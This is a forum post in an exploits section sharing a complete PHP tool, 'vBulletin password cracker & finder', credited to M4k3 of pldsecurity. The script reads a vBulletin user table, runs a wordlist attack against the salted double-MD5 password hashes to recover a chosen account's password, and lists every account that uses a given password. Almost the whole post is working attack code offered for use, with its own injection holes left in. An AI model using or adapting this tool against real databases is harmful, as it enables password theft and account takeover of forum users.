Jump to content
Ras

vBulletin password cracker & finder v1.0.2b

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted


############################################################
## Author: M4k3 ##
## Script-Version: 1.0.2b ##
## Script-Name: vb_tool.php ##
## Copyright: pldsecurity.de / .com /pldsoft.com ##
## ##
## Comment: Next Version coming soon, check ##
## pldsecurity.com for Updates ##
############################################################

# For Crack Option, you need: [vbulletin database] & [wordlist]
# For Find Option, you need: [vbulletin database]

###################### Set Error Reporting #################
error_reporting(E_ALL & ~E_NOTICE);

set_time_limit(60);

# 60 for a database with 1000 Users
# 180 for a database with 3000 Users
####################### Change Values ######################

#MySQL Values
$mysql[server] = 'localhost:3306';
$mysql[username] = 'root';
$mysql[password] = '';
$mysql[database] = 'vbulletin';
$mysql[table] = 'user';
$mysql[/page][page] = '20'; # Show 20 User / Site on User list

#Script Values
$script[wordlist] = 'word.txt';

if(!file_exists($script[wordlist])) {
$script[crack_option] = false;
}

$script[version] = '1.0.2b';

#############################################################

###################### Connection ###########################

$mysql[connect] = mysql_connect($mysql[server], $mysql[username], $mysql[password])
or die ("MySQL-Error: " .mysql_error());

$mysql[connect_db] = mysql_select_db($mysql[database], $mysql[connect])
or die ("MySQL-Error: " . mysql_error());

#############################################################

function check_table() {
global $mysql;

$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());
if(!mysql_error()) {
return 1;
}
}

function find_password($_POST) {
global $mysql;

$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());

while($user = mysql_fetch_array($query)) {
$script[get_salt] .= $user[salt].htmlentities('<r>');
}

$script[salt] = explode(htmlentities('<r>'), $script[get_salt]);


$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());

while($user = mysql_fetch_array($query)) {

for($i=0;$i<=sizeof($script[salt]);$i++) {
if(md5(md5(rtrim($_POST['password'])).$script[salt][$i]) == $user[password]) {
print 'Password found! Username: '.$user[username].' Userid: '.$user[userid].'
';
flush();
}
}
}
}

function crack_password($_POST) {
global $script;
global $mysql;

$query = mysql_query("Select * from ".$mysql[table]." where username = '".addslashes($_POST['username'])."'")
or die ("MySQL-Error: " . mysql_error());
$user = mysql_fetch_array($query);

if(!is_array($user)) {
print 'The User with the name [b]'.addslashes($_POST['username']).'[/b] doesn\'t exist.

<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
} else {
$file = fopen($script[wordlist], 'r');

while(!feof($file)) {

$word = fgets($file, 4096);

if(md5(md5(rtrim($word)).$user[salt]) == $user[password]) {
print 'Password Cracked! Password is [b]'.$word.'[/b]';
$cracked = true;
}

}
if($cracked == false) {
print 'Failed to Crack Password.';
}
fclose($file);
}
}


if(check_table() == 1) {
print '<html>
<head>
<title>VBulletin Password Cracker</title>
<style type = "text/css">
body {
font-size: 11px;
text-align: center;
}
.option_table {
font-size: 11px;
border: 1px #000000 solid;
width: 300px;
}
.main_table {
font-size: 11px;
border: 1px #000000 solid;
width: 350px;
}
.user_table {
font-size: 11px;
text-align: center;
border: 0px #000000 solid;
}
.show_user {
border: 1px #000000 solid;
width: 125px;
}
.input_text {
font-size: 11px;
}
.input_submit {
color: #ffffff;
font-size: 11px;
border: 1px #000000 solid;
background-color: #000000;
}
a:link {
color: #000000;
text-decoration: none;
}
a:hover {
color: #000000;
text-decoration: underline overline;
}
</style>
</head>
<body>';


if(empty($_GET['crack_option']) && empty($_GET['find_option'])) {
print '<form method = "get">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "option_table">
<tr>
<td colspan = "2" align = "center">
[b]vbulletin password cracker & finder '.$script[version].'[/b]

<hr size = "1" style = "border: 1px #000000 solid;"
</td>
</tr>
<tr>
<td>';
if($script[crack_option] !== false) {
print '<input type = "checkbox" name = "crack_option">';
} else {
print '<input type = "checkbox" name = "crack_option" disabled>';
}
print '</td>
<td>
Use "Crack Password" Option
</td>
</tr>
<tr>
<td>
<input type = "checkbox" name = "find_option">
</td>
<td>
Use "Find Password" Option
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<hr size = "1" style = "border: 1px #000000 solid;"
<input type = "submit" value = "Run Option" class = "input_submit">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
© Copyright by M4k3 <a href = "http://pldsecurity.com">PLDsecurity.com</a>
</td>
</tr>
</table>
</form>';
}


if($_GET['crack_option'] == 'on') {

if($_GET['do'] == 'show_user') {

print '<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "user_table">
<tr>
<td colspan = "2" class = "show_user">
Please select a username.
</td>
</tr>
<tr>
<td class = "show_user">
Userid
</td>
<td class = "show_user">
Username
</td>
</tr>';

if(empty($_GET['start']) && empty($_GET['end'])) {
$query = mysql_query("Select userid, username from ".$mysql[table]." limit 0, ".$mysql[/page][page]."")
or die ("MySQL-Error: " . mysql_error());

while($show_user = mysql_fetch_array($query)) {
print '<tr>
<td class = "show_user">
'.$show_user[userid].'
</td>
<td class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'">
'.$show_user[username].'</a>
</td>
</tr>';
}

print '<tr>
<td colspan = "2" align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$mysql[/page][page].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>


';

print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';

} else {

$query = mysql_query("Select userid, username from ".$mysql[table]." limit
".addslashes($_GET['start']).",".addslashes($_GET['end'])."")
or die ("MySQL-Error: " . mysql_error());

while($show_user = mysql_fetch_array($query)) {
print '<tr>
<td class = "show_user">
'.$show_user[userid].'
</td>
<td class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'">
'.$show_user[username].'</a>
</td>
</tr>';
}

$page[next] = $_GET['start'] + $mysql[/page][page];
$page[previous] = $_GET['start'] - $mysql[/page][page];

$query = mysql_query("Select count(*) from user")
or die ("MySQL-Error: " . mysql_error());
$mysql[table_count] = mysql_fetch_array($query);

if($page[previous] < 0) {
print '<tr>
<td colspan = "2" align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>


';
} elseif($page[next] > $mysql[table_count][0]) {
print '<tr>
<td colspan = "2" align = "left" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'">
<< Previous Page</a>
</td>
</tr>
</table>


';
} else {
print '<tr>
<td align = "left" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'">
<< Previous Page</a>
</td>
<td align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>


';
}
print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
}

} elseif($_GET['do'] == 'crack_password' && !empty($_POST['username'])) {

crack_password($_POST);

} else {

print '<form action = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=crack_password" method = "post">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table">
<tr>
<td colspan = "2" align = "center">
Insert a username or use the function "show user list"
<hr size = "1" style = "border: 1px #000000 solid;">
</td>
</tr>
<tr>
<td>
Username:
</td>
<td>';
if($_GET['do'] == 'get_user' && !empty($_GET['username'])) {
print '<input type = "text" name = "username" value = "'.$_GET['username'].'" size = "30"
class = "input_text">';
} else {
print '<input type = "text" name = "username" size = "30" class = "input_text">';
}

print '</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<input type = "submit" value = "Crack Password" class = "input_submit">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<hr size = "1" style = "border: 1px #000000 solid;">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user">show user list</a>
</td>
</tr>
</table>
</form>



<a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';

}

} elseif($_GET['find_option'] == 'on') {

if($_GET['do'] == 'find_password' && !empty($_POST['password'])) {
print 'Searching...
';
flush();
find_password($_POST);
} else {
print '<form action = "'.$_SERVER[PHP_SELF].'?find_option=on&do=find_password" method = "post">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table">
<tr>
<td colspan = "2" align = "center">
Please insert a password.
<hr size = "1" style = "border: 1px #000000 solid;">
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type = "text" name = "password" size = "30" class = "input_text">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<input type = "submit" value = "Find Password" class = "input_submit">
</td>
</tr>
</table>
</form>



<a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';
}

}

print '


</body>
</html>';

}

?>
<?

# For Crack Option, you need: [vbulletin database] & [wordlist]

# For Find Option, you need: [vbulletin database]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...